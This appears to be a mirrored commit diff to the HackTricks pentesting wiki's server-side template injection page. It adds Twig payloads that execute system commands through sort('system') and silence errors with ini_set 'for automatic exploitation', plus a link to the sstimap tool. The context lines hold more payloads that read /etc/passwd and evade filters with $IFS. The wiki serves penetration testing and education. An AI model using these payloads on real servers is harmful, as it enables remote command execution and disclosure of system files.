mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
commit
843e7a2d22
1 changed files with 6 additions and 0 deletions
|
@ -546,6 +546,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
|
||||||
{{['id']|filter('system')}}
|
{{['id']|filter('system')}}
|
||||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
|
{{['id',""]|sort('system')}}
|
||||||
|
|
||||||
|
#Hide warnings and errors for automatic exploitation
|
||||||
|
{{["error_reporting", "0"]|sort("ini_set")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
**Twig - Template format**
|
**Twig - Template format**
|
||||||
|
@ -1045,6 +1049,8 @@ If you think it could be useful, read:
|
||||||
|
|
||||||
{% embed url="https://github.com/Hackmanit/TInjA" %}
|
{% embed url="https://github.com/Hackmanit/TInjA" %}
|
||||||
|
|
||||||
|
{% embed url="https://github.com/vladko312/sstimap" %}
|
||||||
|
|
||||||
{% embed url="https://github.com/epinna/tplmap" %}
|
{% embed url="https://github.com/epinna/tplmap" %}
|
||||||
|
|
||||||
{% embed url="https://github.com/Hackmanit/template-injection-table" %}
|
{% embed url="https://github.com/Hackmanit/template-injection-table" %}
|
||||||
|
|
Loading…
Add table
Reference in a new issue